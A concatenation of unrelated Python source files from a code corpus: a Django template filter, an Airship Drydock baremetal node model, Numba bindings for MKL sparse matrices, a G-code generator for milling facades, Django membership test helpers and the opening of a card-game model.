app_icon = "Related files/glassicon.ico",
timeout = 5
)
time.sleep(60*40) #This makes the code to run every 40 and remind you.
|
StarcoderdataPython
|
369459
|
import django.utils.safestring
from django import template
from django.utils.translation import gettext_lazy as _
register = template.Library()
@register.filter
def copyable(value):
value = str(value)
if '"' in value:
return value
title = str(_("Copy"))
return django.utils.safestring.mark_safe(
f"""
<span data-destination="{value}"
class="copyable-text"
data-toggle="tooltip"
data-placement="top"
title="{title}"
>
{value}
</span>"""
)
|
StarcoderdataPython
|
8005099
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Models for drydock_provisioner
#
"""Drydock model of a baremetal node."""
from defusedxml.ElementTree import fromstring
import logging
from oslo_versionedobjects import fields as ovo_fields
import drydock_provisioner.error as errors
import drydock_provisioner.config as config
import drydock_provisioner.objects as objects
import drydock_provisioner.objects.hostprofile
import drydock_provisioner.objects.base as base
import drydock_provisioner.objects.fields as hd_fields
@base.DrydockObjectRegistry.register
class BaremetalNode(drydock_provisioner.objects.hostprofile.HostProfile):
VERSION = '1.0'
fields = {
'addressing': ovo_fields.ObjectField('IpAddressAssignmentList'),
'boot_mac': ovo_fields.StringField(nullable=True),
}
# A BaremetalNode is really nothing more than a physical
# instantiation of a HostProfile, so they both represent
# the same set of CIs
def __init__(self, **kwargs):
super(BaremetalNode, self).__init__(**kwargs)
self.logicalnames = {}
self.logger = logging.getLogger(
config.config_mgr.conf.logging.global_logger_name)
# Compile the applied version of this model sourcing referenced
# data from the passed site design
def compile_applied_model(self,
site_design,
state_manager,
resolve_aliases=False):
self.logger.debug("Compiling effective node model for %s" % self.name)
self.apply_host_profile(site_design)
self.apply_hardware_profile(site_design)
self.source = hd_fields.ModelSource.Compiled
self.resolve_kernel_params(site_design)
if resolve_aliases:
self.logger.debug(
"Resolving device aliases on node %s" % self.name)
self.apply_logicalnames(site_design, state_manager)
return
def apply_host_profile(self, site_design):
self.apply_inheritance(site_design)
return
# Translate device aliases to physical selectors and copy
# other hardware attributes into this object
def apply_hardware_profile(self, site_design):
if self.hardware_profile is None:
raise ValueError("Hardware profile not set")
hw_profile = site_design.get_hardware_profile(self.hardware_profile)
for i in getattr(self, 'interfaces', []):
for s in i.get_hw_slaves():
selector = hw_profile.resolve_alias("pci", s)
if selector is None:
selector = objects.HardwareDeviceSelector()
selector.selector_type = 'name'
selector.address = s
i.add_selector(selector)
for p in getattr(self, 'partitions', []):
selector = hw_profile.resolve_alias("scsi", p.get_device())
if selector is None:
selector = objects.HardwareDeviceSelector()
selector.selector_type = 'name'
selector.address = p.get_device()
p.set_selector(selector)
return
def get_domain(self, site_design):
"""Return the domain for this node.
The domain for this is the DNS domain of the primary network or local.
:param SiteDesign site_design: A instance containing definitions for the networks
this node is attached to.
"""
try:
pn = site_design.get_network(self.primary_network)
domain = pn.dns_domain or "local"
except errors.DesignError as dex:
self.logger.debug("Primary network not found, use domain 'local'.")
domain = "local"
except AttributeError as aex:
self.logger.debug(
"Primary network does not define a domain, use domain 'local'."
)
domain = "local"
return domain
def get_fqdn(self, site_design):
"""Returns the FQDN for this node.
The FQDN for this node is composed of the node hostname ``self.name`` appended
with the domain name of the primary network if defined. If the primary network
does not define a domain name, the domain is ``local``.
:param site_design: A SiteDesign instance containing definitions for the networks
the node is attached to.
"""
hostname = self.name
domain = self.get_domain(site_design)
return "{}.{}".format(hostname, domain)
def resolve_kernel_params(self, site_design):
"""Check if any kernel parameter values are supported references."""
if not self.hardware_profile:
raise ValueError("Hardware profile not set.")
hwprof = site_design.get_hardware_profile(self.hardware_profile)
if not hwprof:
raise ValueError("Hardware profile not found.")
resolved_params = dict()
for p, v in self.kernel_params.items():
try:
rv = self.get_kernel_param_value(v, hwprof)
resolved_params[p] = rv
except (errors.InvalidParameterReference, errors.CpuSetNotFound,
errors.HugepageConfNotFound) as ex:
resolved_params[p] = v
msg = ("Error resolving parameter reference on node %s: %s" %
(self.name, str(ex)))
self.logger.warning(msg)
self.kernel_params = resolved_params
def get_kernel_param_value(self, value, hwprof):
"""If ``value`` is a reference, resolve it otherwise return ``value``
Support some referential values to extract data from the HardwareProfile
hardwareprofile:cpuset.<setname>
hardwareprofile:hugepages.<confname>.size
hardwareprofile:hugepages.<confname>.count
If ``value`` matches none of the above forms, just return the value as passed.
:param value: the value string as specified in the node definition
:param hwprof: the assigned HardwareProfile for this node
"""
if value.startswith('hardwareprofile:'):
(_, ref) = value.split(':', 1)
if ref:
(ref_type, ref_val) = ref.split('.', 1)
if ref_type == 'cpuset':
return hwprof.get_cpu_set(ref_val)
elif ref_type == 'hugepages':
(conf, field) = ref_val.split('.', 1)
hp_conf = hwprof.get_hugepage_conf(conf)
if field in ['size', 'count']:
return getattr(hp_conf, field)
else:
raise errors.InvalidParameterReference(
"Invalid field %s specified." % field)
else:
raise errors.InvalidParameterReference(
"Invalid configuration %s specified." % ref_type)
else:
return value
else:
return value
def get_kernel_param_string(self):
params = dict(self.kernel_params)
if 'hugepagesz' in params:
if 'hugepages' not in params:
raise errors.InvalidParameterReference(
'must specify both size and count for hugepages')
kp_string = 'hugepagesz=%s hugepages=%s' % (
params.pop('hugepagesz'), params.pop('hugepages'))
else:
kp_string = ''
for k, v in params.items():
if v == 'True':
kp_string = kp_string + " %s" % (k)
else:
kp_string = kp_string + " %s=%s" % (k, v)
return kp_string
def get_applied_interface(self, iface_name):
for i in getattr(self, 'interfaces', []):
if i.get_name() == iface_name:
return i
return None
def get_network_address(self, network_name):
for a in getattr(self, 'addressing', []):
if a.network == network_name:
return a.address
return None
def find_fs_block_device(self, fs_mount=None):
if not fs_mount:
return (None, None)
if self.volume_groups is not None:
for vg in self.volume_groups:
if vg.logical_volumes is not None:
for lv in vg.logical_volumes:
if lv.mountpoint is not None and lv.mountpoint == fs_mount:
return (vg, lv)
if self.storage_devices is not None:
for sd in self.storage_devices:
if sd.partitions is not None:
for p in sd.partitions:
if p.mountpoint is not None and p.mountpoint == fs_mount:
return (sd, p)
return (None, None)
def _apply_logicalname(self, xml_root, alias_name, bus_type, address):
"""Given xml_data, checks for a matching businfo and returns the logicalname
:param xml_root: Parsed ElementTree, it is searched for the logicalname.
:param alias_name: String value of the current device alias, it is returned
if a logicalname is not found.
:param bus_type: String value that is used to find the logicalname.
:param address: String value that is used to find the logicalname.
:return: String value of the logicalname or the alias_name if logicalname is not found.
"""
nodes = xml_root.findall(".//node[businfo='" + bus_type + "@" +
address + "'].logicalname")
if len(nodes) >= 1 and nodes[0].text:
if (len(nodes) > 1):
self.logger.info("Multiple nodes found for businfo=%s@%s" %
(bus_type, address))
for logicalname in reversed(nodes[0].text.split("/")):
self.logger.debug(
"Logicalname build dict: node_name = %s, alias_name = %s, "
"bus_type = %s, address = %s, to logicalname = %s" %
(self.get_name(), alias_name, bus_type, address,
logicalname))
return logicalname
self.logger.debug(
"Logicalname build dict: alias_name = %s, bus_type = %s, address = %s, not found"
% (alias_name, bus_type, address))
return alias_name
def apply_logicalnames(self, site_design, state_manager):
"""Gets the logicalnames for devices from lshw.
:param site_design: SiteDesign object.
:param state_manager: DrydockState object.
:return: Returns sets a dictionary of aliases that map to logicalnames in self.logicalnames.
"""
logicalnames = {}
results = state_manager.get_build_data(
node_name=self.get_name(), latest=True)
xml_data = None
for result in results:
if result.generator == "lshw":
xml_data = result.data_element
break
if xml_data:
xml_root = fromstring(xml_data)
try:
hardware_profile = site_design.get_hardware_profile(
self.hardware_profile)
for device in hardware_profile.devices:
logicalname = self._apply_logicalname(
xml_root, device.alias, device.bus_type,
device.address)
logicalnames[device.alias] = logicalname
except errors.DesignError:
self.logger.exception(
"Failed to load hardware profile while "
"resolving logical names for node %s", self.get_name())
raise
else:
self.logger.info(
"No Build Data found for node_name %s" % (self.get_name()))
self.logicalnames = logicalnames
def get_logicalname(self, alias):
"""Gets the logicalname from self.logicalnames for an alias or returns the alias if not in the dictionary.
"""
if (self.logicalnames and self.logicalnames.get(alias)):
self.logger.debug("Logicalname input = %s with output %s." %
(alias, self.logicalnames[alias]))
return self.logicalnames[alias]
else:
self.logger.debug(
"Logicalname input = %s not in logicalnames dictionary." %
alias)
return alias
def get_node_labels(self):
"""Get node labels.
"""
labels_dict = {}
for k, v in self.owner_data.items():
labels_dict[k] = v
self.logger.debug("node labels data : %s." % str(labels_dict))
# TODO: Generate node labels
return labels_dict
@base.DrydockObjectRegistry.register
class BaremetalNodeList(base.DrydockObjectListBase, base.DrydockObject):
VERSION = '1.0'
fields = {'objects': ovo_fields.ListOfObjectsField('BaremetalNode')}
@base.DrydockObjectRegistry.register
class IpAddressAssignment(base.DrydockObject):
VERSION = '1.0'
fields = {
'type': ovo_fields.StringField(),
'address': ovo_fields.StringField(nullable=True),
'network': ovo_fields.StringField(),
}
def __init__(self, **kwargs):
super(IpAddressAssignment, self).__init__(**kwargs)
# IpAddressAssignment keyed by network
def get_id(self):
return self.network
@base.DrydockObjectRegistry.register
class IpAddressAssignmentList(base.DrydockObjectListBase, base.DrydockObject):
VERSION = '1.0'
fields = {'objects': ovo_fields.ListOfObjectsField('IpAddressAssignment')}
|
StarcoderdataPython
|
256335
|
import sys
from typing import Optional
import dataclasses
from numba.core.types.functions import _ResolutionFailures
import numpy as np
from numba import njit, config
from numba.extending import overload
from numba.core.types import StructRef, intc, float64
from numba.experimental import structref
from csr import CSR
from ._api import * # noqa: F403
from csr.constructors import create_empty
__all__ = [
'mkl_h',
'to_handle',
'from_handle',
'release_handle'
]
@structref.register
class mkl_h_type(StructRef):
"Internal Numba type for MKL handles"
pass
if config.DISABLE_JIT:
@dataclasses.dataclass
class mkl_h:
H: int
nrows: int
ncols: int
csr_ref: Optional[np.ndarray]
else:
class mkl_h(structref.StructRefProxy):
"""
Type for MKL handles. Opaque, do not use directly.
"""
structref.define_proxy(mkl_h, mkl_h_type, ['H', 'nrows', 'ncols', 'csr_ref'])
def _make_handle_impl(csr):
"Make a handle from a known-constructable CSR"
_sp = ffi.from_buffer(csr.rowptrs)
_cols = ffi.from_buffer(csr.colinds)
vs = csr.values
assert vs.size == csr.nnz
_vals = ffi.from_buffer(vs)
h = lk_mkl_spcreate(csr.nrows, csr.ncols, _sp, _cols, _vals)
lk_mkl_spopt(h)
return mkl_h(h, csr.nrows, csr.ncols, csr)
_make_handle = njit(_make_handle_impl)
def to_handle(csr: CSR) -> mkl_h:
if csr.nnz == 0:
# empty matrices don't really work
return mkl_h(0, csr.nrows, csr.ncols, None)
norm = csr._normalize(np.float64, np.intc)
return _make_handle(norm)
@overload(to_handle)
def to_handle_jit(csr):
if csr.ptr_type.dtype != intc:
raise TypeError('MKL requires intc row pointers')
if csr.has_values:
vt = csr.val_type.dtype
else:
vt = None
def mkh(csr):
vs = csr._required_values().astype(np.float64)
csr2 = CSR(csr.nrows, csr.ncols, csr.nnz, csr.rowptrs, csr.colinds, vs)
if csr.nnz == 0:
return mkl_h(0, csr.nrows, csr.ncols, csr2)
return _make_handle(csr2)
return mkh
@njit
def from_handle(h: mkl_h) -> CSR:
if not h.H:
return create_empty(h.nrows, h.ncols)
rvp = lk_mkl_spexport_p(h.H)
if rvp is None:
return None
nrows = lk_mkl_spe_nrows(rvp)
ncols = lk_mkl_spe_ncols(rvp)
sp = lk_mkl_spe_row_sp(rvp)
ep = lk_mkl_spe_row_ep(rvp)
cis = lk_mkl_spe_colinds(rvp)
vs = lk_mkl_spe_values(rvp)
rowptrs = np.zeros(nrows + 1, dtype=np.intc)
nnz = 0
for i in range(nrows):
nnz += ep[i] - sp[i]
rowptrs[i + 1] = nnz
assert nnz == ep[nrows - 1]
colinds = np.zeros(nnz, dtype=np.intc)
values = np.zeros(nnz)
for i in range(nrows):
rs = rowptrs[i]
re = rowptrs[i + 1]
ss = sp[i]
for j in range(re - rs):
colinds[rs + j] = cis[ss + j]
values[rs + j] = vs[ss + j]
lk_mkl_spe_free(rvp)
return CSR(nrows, ncols, nnz, rowptrs, colinds, values)
@njit
def order_columns(h):
"""
Sort matrix rows in increasing column order.
"""
if h.H:
lk_mkl_sporder(h.H)
@njit
def release_handle(h: mkl_h):
if h.H:
lk_mkl_spfree(h.H)
h.H = 0
|
StarcoderdataPython
|
5030360
|
<filename>test.py
import json
import os
def read_json():
with open('data.json', encoding='utf-8') as read_file:
data = json.load(read_file)
return data
def g_line(n, line):
tmp = "N{0} {1}\n".format(str(n).zfill(2), line)
return tmp
def get_points(fl, fw, fm):
# --> crutch :)
fm2 = fm
if fw == 140:
if fm == 61 : fm2 = 35
if fm == 70 : fm2 = 44
# <--
points = []
points.append((fm2, fm))
points.append((fm2, fl-fm))
points.append((fw-fm2, fl-fm))
points.append((fw-fm2, fm))
points.append((fm2, fm))
return points
def make_gcode(fasad, freza):
DEFAULT_Z = 16.000
PREPARE_Z = 1.000
PAUSE1 = 4000
PAUSE2 = 10000
flength = fasad[0]
fwidth = fasad[1]
fmargin = freza['отступ']
points = get_points(flength, fwidth, fmargin)
gcode = 'G00 G90 Z{} \n'.format(DEFAULT_Z)
gcode += 'G00 X{} Y{} S{} M03 \n'.format(points[0][0], points[0][1], freza['шпиндель'])
gcode += 'G00 Z{} \n'.format(PREPARE_Z)
gcode += 'G04 P{} \n'.format(PAUSE1)
for depth in freza['глубина']:
for point in points:
gcode += 'G01 X{} Y{} Z-{} F{} S{} \n'.format(point[0], point[1], depth, freza['подача'], freza['шпиндель'])
gcode += 'G00 Z{} \n'.format(DEFAULT_Z)
gcode += 'M05 \n'
gcode += 'G00 X0.0000 Y0.0000 \n'
gcode += 'G04 P{} \n'.format(PAUSE2)
gcode += 'M02 \n'
return gcode
def num_gcode(gcode):
n = 0
tmp = ""
for line in gcode.split('\n'):
if len(line) > 0:
n += 1
tmp += "N{:02} {}\n".format(n, line)
return tmp
def make_nc_file(foldername, fasad, freza):
gcode = make_gcode(fasad, freza)
gcode = num_gcode(gcode)
if not os.path.exists(foldername):
os.makedirs(foldername)
filename = foldername + "/" + "{0}x{1}_{2}.nc".format(fasad[0], fasad[1], freza['имя'])
print(filename)
print(gcode)
f = open(filename, 'w')
f.write(gcode)
f.close()
def make_gcode_file(data):
for freza in data['фрезы']:
foldername = "{}/{}".format(data['папка'], freza['отступ'])
for fasad in data['фасады']:
make_nc_file(foldername, fasad, freza)
def main():
json_data = read_json()
make_gcode_file(json_data)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3254531
|
<filename>membership/test_utils.py
# -*- coding: utf-8 -*-
import logging
from random import Random
# Use predictable random for consistent tests
random = Random()
random.seed(1)
logger = logging.getLogger("membership.test_utils")
from membership.models import Membership, Contact
# We use realistic names in test data so that it is feasible to test
# duplicate member detection code locally without using production data.
# Finnish population register center's most popular first names for year 2009
first_names = [
"Maria", "Juhani", "Aino", "Veeti", "Emilia", "Johannes", "Venla",
"Eetu", "Sofia", "Mikael", "Emma", "Onni", "Olivia", "Matias",
"Ella", "Aleksi", "Aino", "Olavi", "Sofia", "Leevi", "Amanda",
"Onni", "Aada", "Elias", "Matilda", "Ilmari", "Sara", "Lauri",
"Helmi", "Oskari", "Iida", "Joona", "Aurora", "Elias", "Anni",
"Matias", "Ilona", "Oliver", "Helmi", "Leo", "Iida", "Eemeli",
"Emilia", "Niilo", "Eveliina", "Valtteri", "Siiri", "Rasmus", "Katariina",
"Aleksi", "Veera", "Oliver", "Ella", "Antero", "Sanni", "Miro",
"Aada", "Viljami", "Vilma", "Jimi", "Kristiina", "Kristian", "Nea",
"Aatu", "Anni", "Tapani", "Milla", "Daniel", "Johanna", "Samuel",
"Pinja", "Juho", "Emma", "Lauri", "Lotta", "Aapo", "Sara",
"Tapio", "Olivia", "Eemeli", "Linnea", "Veeti", "Elli", "Jesse",
"Anna", "Eetu", "Emmi", "Arttu", "Elina", "Emil", "Ronja",
"Lenni", "Venla", "Petteri", "Elsa", "Valtteri", "Julia", "Daniel",
"Nella", "Otto", "Aleksandra", "Eemil", "Kerttu", "Aaro", "Helena",
"Juho", "Oona", "Joel", "Siiri", "Leevi", "Viivi", "Niklas",
"Karoliina", "Joona", "Julia", "Ville", "Inkeri", "Julius", "Pihla",
"Roope", "Alexandra", "Elmeri", "Peppi", "Konsta", "Alisa", "Leo",
"Nelli", "Juuso", "Susanna", "Otto", "Neea", "Luka", "Josefiina",
"Aleksanteri", "Jenna", "Mikael", "Kaarina", "Akseli", "Laura", "Samuel",
"Lotta", "Sakari", "Anna", "Oskari", "Alina", "Anton", "Milja",
"Julius", "Ellen", "Veikko", "Enni", "Luukas", "Veera", "Toivo",
"Alisa", "Jere", "Sanni", "Eino", "Ilona", "Niko", "Kerttu",
"Niilo", "Inka", "Eelis", "Elsa", "Jaakko", "Amanda", "Eeli",
"Elli", "Rasmus", "Minea", "Anton", "Vilma", "Antti", "Matilda",
"Eino", "Vilhelmiina", "Väinö", "Iina", "Emil", "Nea", "Henrik",
"Eevi", "Kasper", "Anneli", "Matti", "Ellen", "Tuomas", "Maija",
"Aatu", "Saana", "Eemil", "Tuulia", "Kalevi", "Minttu", "Akseli",
"Anniina", "Joonatan", "Lilja", "Viljami"]
# Kapsi members public unique last name listing as of today.
last_names = [
"Aalto", "Aaltonen", "Addams-Moring", "Aho", "Ahola", "Ahonen",
"Aimonen", "Al-Khanji", "Ala-Kojola", "Alakotila", "Alanenpää", "Alanko",
"Alardt", "Alaspää", "Alatalo", "Andelin", "Annala", "Antinkaapo",
"Anttila", "Anttonen", "Arstila", "Arvelin", "Auvinen", "Averio",
"Bainton", "Behm", "Blomberg", "Borén", "Brander", "Brockman",
"Brunberg", "Busk", "Ceder", "Corsini", "Duldin", "Eerikäinen",
"Eerola", "Ekblom", "Ekman", "Eloranta", "Emas", "Eriksson",
"Ernsten", "Erola", "Eräluoto", "Eskelinen", "Eskola", "Everilä",
"Finnilä", "Fjällström", "Forslund", "Grandell", "Grenrus", "Gröhn",
"Grönlund", "Haapajärvi", "Haapala", "Haasanen", "Haatainen", "Haataja",
"Haavisto", "Hagelberg", "Hahtola", "Haikonen", "Haimi", "Hakanen",
"Hakkarainen", "Halkosaari", "Halla", "Hallamaa", "Hallikainen", "Halme",
"Halmu", "Halonen", "Hamara", "Hanhijärvi", "Hannola", "Hannus",
"Hansson", "Harju", "Harkila", "Harma", "Hasanen", "Hassinen",
"Hast", "Hastrup", "Hatanpää", "Haverinen", "Heikkerö", "Heikkilä",
"Heikkinen", "Heikura", "Heimonen", "Heinikangas", "Heinonen", "Heinänen",
"Heiramo", "Heiskanen", "Helander", "Helenius", "Herd", "Herranen",
"Herukka", "Heusala", "Hietala", "Hietanen", "Hietaranta", "Hiilesrinne",
"Hiljander", "Hill", "Hillervo", "Hiltunen", "Hinkula", "Hintikka",
"Hirvojärvi", "Holopainen", "Hongisto", "Honkanen", "Honkonen", "Hopiavuori",
"Hotti", "Huhtala", "Huhtinen", "Hulkko", "Huoman", "Huotari",
"Huovinen", "Hurtta", "Huttunen", "Huuhtanen", "Huuskonen", "Hyttinen",
"Hyvärinen", "Häkkinen", "Hämeenkorpi", "Hämäläinen", "Hänninen", "Höglund",
"Ihatsu", "Ijäs", "Ikonen", "Ilmonen", "Iltanen", "Ingman",
"Inha", "Inkinen", "Isaksson", "Isomäki", "Ituarte", "Itäsalo",
"Jaakkola", "Jaatinen", "Jakobsson", "Jalonen", "Jetsu", "Johansson",
"Jokela", "Jokinen", "Jokitalo", "Jormanainen", "Junni", "Juopperi",
"Juutinen", "Juvankoski", "Juvonen", "Järvenpää", "Järvensivu", "Järvinen",
"Jääskelä", "Jääskeläinen", "Kaarela", "Kaartti", "Kaija", "Kaikkonen",
"Kaila", "Kainulainen", "Kajan", "Kakko", "Kallio", "Kanniainen",
"Kanninen", "Kare-Mäkiaho", "Karhunen", "Kari", "Karimäki", "Karisalmi",
"Karjalainen", "Karlsson", "Karppi", "Karttunen", "Karvinen", "Karvonen",
"Kasari", "Kataja", "Katavisto", "Kattelus", "Kauppi", "Kauppinen",
"Keihänen", "Keijonen", "Kekki", "Kekkonen", "Kelanne", "Kenttälä",
"Keränen", "Keskitalo", "Kesti", "Ketolainen", "Ketonen", "Kettinen",
"Kianto", "Kiiskilä", "Kilpiäinen", "Kinnula", "Kinnunen", "Kirkkopelto",
"Kirves", "Kittilä", "Kiviharju", "Kivikunnas", "Kivilahti", "Kiviluoto",
"Kivimäki", "Kivirinta", "Knuutinen", "Kohtamäki", "Kois", "Koivisto",
"Koivu", "Koivula", "Koivulahti", "Koivumaa", "Koivunalho", "Koivunen",
"Koivuranta", "Kokkonen", "Kokkoniemi", "Komulainen", "Konsala", "Konttila",
"Konttinen", "Koponen", "Korhonen", "Kortesalmi", "Kortetmäki", "Koskela",
"Koskenniemi", "Koski", "Petteri", "Koskinen", "Kotanen", "Koulu",
"Kraft", "Krohn", "Krüger", "Kudjoi", "Kuhanen", "Kuittinen",
"Kuitunen", "Kujala", "Kujansuu", "Kulju", "Kurkimäki", "Kuukasjärvi",
"Kuusisto", "Kuvaja", "Kymäläinen", "Kyntöaho", "Kähkönen", "Käki",
"Kärkkäinen", "Kärnä", "Laaksonen", "Laalo", "Laapotti", "Lagren",
"Lagus", "Lahdenmäki", "Lahdenperä", "Lahikainen", "Lahtela", "Laine",
"Lainiola", "Laitila", "Laitinen", "Untamo", "Lakhan", "Lamminen",
"Lammio", "Lampela", "Lampén", "Lampi", "Lampinen", "Lankila",
"Lapinniemi", "Lappalainen", "Larivaara", "Larja", "Latvatalo", "Laurila",
"Laxström", "Lehmuskenttä", "Lehtinen", "Lehtola", "Lehtonen", "Leikkari",
"Leiviskä", "Leivo", "Lempinen", "Lepistö", "Leppänen", "Levonen",
"Lievemaa", "Liimatta", "Likitalo", "Liljeqvist", "Lindeman", "Lindén",
"Lindfors", "Lindström", "Linkoaho", "Linkola", "Linnaluoto", "Linnamäki",
"Lintervo", "Lintumäki", "Lipsanen", "Liukkonen", "Loikkanen", "Loponen",
"Louhiranta", "Lundan", "Luosmaa", "Luukko", "Luukkonen", "Lähdemäki",
"Lähteenmäki", "Löfgren", "Löytty", "Maaranen", "Magga", "Makkonen",
"Maksimainen", "Malinen", "Malm", "Malmivirta", "Manner", "Manninen",
"Mansikkala", "Marin", "Marjamaa", "Marjoneva", "Markkanen", "Martikainen",
"Marttila", "Matikainen", "Matkaselkä", "Mattila", "Maukonen", "Melama",
"Melenius", "Mellin", "Merikivi", "Meriläinen", "Merisalo", "Meskanen",
"Miettunen", "Miinin", "Mikkonen", "Moisala", "Moisio", "Mononen",
"Montonen", "Mustonen", "Myllymäki", "Myllyselkä", "Myntti", "Myyry",
"Mähönen", "Mäkelä", "Mäkeläinen", "Mäkinen", "Mäkitalo", "Mänki",
"Mäntylä", "Märsy", "Mättö", "Mäyränen", "Määttä", "Möller",
"Nemeth", "Niemelä", "Niemenmaa", "Niemi", "Nieminen", "Niiranen",
"Nikander", "Nikkonen", "Nikula", "Niskanen", "Nisula", "Nousiainen",
"Nummiaho", "Nurmi", "Nurminen", "Nygren", "Nykänen", "Nylund",
"Nyrhilä", "Näyhä", "Ohtamaa", "Ojala", "Ollila", "Olmari",
"Oras", "Paajanen", "Paalanen", "Paananen", "Packalen", "Pahalahti",
"Paimen", "Pakkanen", "Palo", "Palokangas", "Palomäki", "Palosaari",
"Panula", "Pappinen", "Parkkinen", "Partanen", "Parviainen", "Pasila",
"Paul", "Pekkanen", "Peltola", "Peltonen", "Pennala", "Pentikäinen",
"Penttilä", "Perttunen", "Perälä", "Pesonen", "Peuhkuri", "Peurakoski",
"Piesala", "Pietarinen", "Pietikäinen", "Pietilä", "Pieviläinen", "Pihkala",
"Pihlaja", "Pihlajaniemi", "Piittinen", "Pikkarainen", "Pirinen", "Pirttijärvi",
"Pitkänen", "Pohjalainen", "Pohjanraito", "Pohjola", "Pokkinen", "Polso",
"Portaankorva", "Portti", "Posti", "Prusi", "Pulliainen", "Puranen",
"Pusa", "Pussinen", "Pyhäjärvi", "Pylvänäinen", "Pölönen", "Pöykkö",
"Raatikainen", "Rahikainen", "Rainela", "Raitanen", "Raitmaa", "Raittila",
"Rajala", "Rajamäki", "Ranki", "Ranta", "Rantala", "Rantamäki",
"Rapo", "Rasilainen", "Rauhala", "Rautiainen", "Rehu", "Reijonen",
"Reunanen", "Riikonen", "Rimpiläinen", "Rissanen", "Ristilä", "Rokka",
"Roponen", "Ruhanen", "Runonen", "Rutanen", "Ruuhonen", "Ruusu",
"Ryhänen", "Rytkönen", "Räsänen", "Räty", "Rönkkö", "Rössi",
"Saarenmäki", "Saarijoki", "Saarikoski", "Saarinen", "Saastamoinen", "Saine",
"Saksa", "Salkia", "Salmela", "Salmi", "Salminen", "Salo",
"Salokanto", "Salomaa", "Salomäki", "Salonen", "Sand", "Sanisalo",
"Santala", "Savolainen", "Schwartz", "Selin", "Seppä", "Seppälä",
"Seppänen", "Setälä", "Siekkinen", "Sievänen", "Sihvo", "Siironen",
"Siitonen", "Silfver", "Sillanpää", "Siltala", "Simola", "Simon",
"Siniluoto", "Sinivaara", "Sipilä", "Sivula", "Sjöberg", "Soili",
"Soini", "Soininen", "Solja", "Solkio", "Sonck", "Sopanen",
"Sotejeff", "Staven", "Strand", "Suckman", "Sunell", "Suolahti",
"Suominen", "Suoniitty", "Suonvieri", "Suorsa", "Suvanne", "Syreeni",
"Syrjä", "Syrjälä", "Syvänen", "Särkkä", "Säämäki", "Sääskilahti",
"Södervall", "Tahvanainen", "Taina", "Taipale", "Taivalsalmi", "Tallqvist",
"Tamminen", "Tammisto", "Tanhua", "Tanner", "Tanskanen", "Tapper-Veirto",
"Tarsa", "Tarvainen", "Tiainen", "Tiira", "Tikka", "Tikkanen",
"Toivanen", "Toivonen", "Tolvanen", "Tulonen", "Tunkkari", "Tuohimaa",
"Tuomela", "Tuomi", "Tuomimaa", "Tuominen", "Tuomivaara", "Turanlahti",
"Turpeinen", "Turunen", "Tuunainen", "Tuusa", "Tykkä", "Tyrväinen",
"Tähtinen", "Töttö", "Urhonen", "Uuksulainen", "Uusitalo", "Vaarala",
"Vaaramaa", "Vainio", "Vainionpää", "Valkeinen", "Valkonen", "Valtonen",
"Valve", "Varanka", "Varrio", "Varsaluoma", "Vartiainen", "Veijalainen",
"Veijola", "Velhonoja", "Venäläinen", "Vesala", "Vesiluoma", "Vestu",
"Vierimaa", "Viippola", "Viitala", "Viitanen", "Vilkki", "Vilppunen",
"Vire", "Virta", "Virtala", "Virtanen", "Vitikka", "Voipio",
"Vuokko", "Vuola", "Vuollet", "Vuorela", "Vuorinen", "Vähäkylä",
"Vähämäki", "Vähänen", "Väisänen", "Välimaa", "Väänänen", "Wahalahti",
"Wikman", "Yli-Hukka", "Ylimäinen", "Ylinen", "Ylönen", "Yrttikoski",
"Äijänen", "Ärmänen"]
def random_first_name():
return random.choice(first_names)
def random_last_name():
return random.choice(last_names)
def create_dummy_member(status, type='P', mid=None):
if status not in ['N', 'P', 'A']:
raise Exception("Unknown membership status") # pragma: no cover
if type not in ['P', 'S', 'O', 'H']:
raise Exception("Unknown membership type") # pragma: no cover
i = random.randint(1, 300)
fname = random_first_name()
d = {
'street_address' : 'Testikatu %d'%i,
'postal_code' : '%d' % (i+1000),
'post_office' : 'Paska kaupunni',
'country' : 'Finland',
'phone' : "%09d" % (40123000 + i),
'sms' : "%09d" % (40123000 + i),
'email' : '<EMAIL>.com' % i,
'homepage' : 'http://www.example.com/%d'%i,
'first_name' : fname,
'given_names' : '%s %s' % (fname, "Kapsi"),
'last_name' : random_last_name(),
}
contact = Contact(**d)
contact.save()
if type == 'O':
contact.organization_name = contact.name()
contact.first_name = ''
contact.last_name = ''
contact.save()
membership = Membership(id=mid, type=type, status=status,
organization=contact,
nationality='Finnish',
municipality='Paska kaupunni',
extra_info='Hintsunlaisesti semmoisia tietoja.')
else:
membership = Membership(id=mid, type=type, status=status,
person=contact,
nationality='Finnish',
municipality='Paska kaupunni',
extra_info='Hintsunlaisesti semmoisia tietoja.')
logger.info("New application %s from %s:." % (str(contact), '::1'))
membership.save()
return membership
class MockLoggingHandler(logging.Handler):
"""Mock logging handler to check for expected logs as per:
<http://stackoverflow.com/questions/899067/how-should-i-verify-a-log-message-when-testing-python-code-under-nose/1049375#1049375>"""
def __init__(self, *args, **kwargs):
self.reset()
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
|
StarcoderdataPython
|
11326511
|
<gh_stars>1-10
from db_file_storage.model_utils import delete_file_if_needed, delete_file
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
from django.utils.translation import gettext_lazy as _
class CardLevel(models.Model):
"""
Card Level.
"""
class Level(models.IntegerChoices):
"""
Enum of possible card levels.
"""
COMMON = 1, _("Typowa"),
RARE = 2, _("Rzadka"),
EPIC = 3, _("Epicka")
level = models.IntegerField(primary_key=True, choices=Level.choices, default=Level.COMMON)
name = models.CharField(max_length=15)
def __str__(self):
return f"{self.name}"
def save(self, *args, **kwargs):
if not isinstance(self.level, CardLevel.Level):
self.level = CardLevel.Level(self.level)
self.name = self.level.label
super(CardLevel, self).save(*args, **kwargs)
class CardEffect(models.Model):
"""
Represents a card effect, contains it's identifier, name and displayed tooltip.
"""
class EffectId(models.IntegerChoices):
"""
All possible effects
"""
DMG = 1, _("Zadawanie obrażeń")
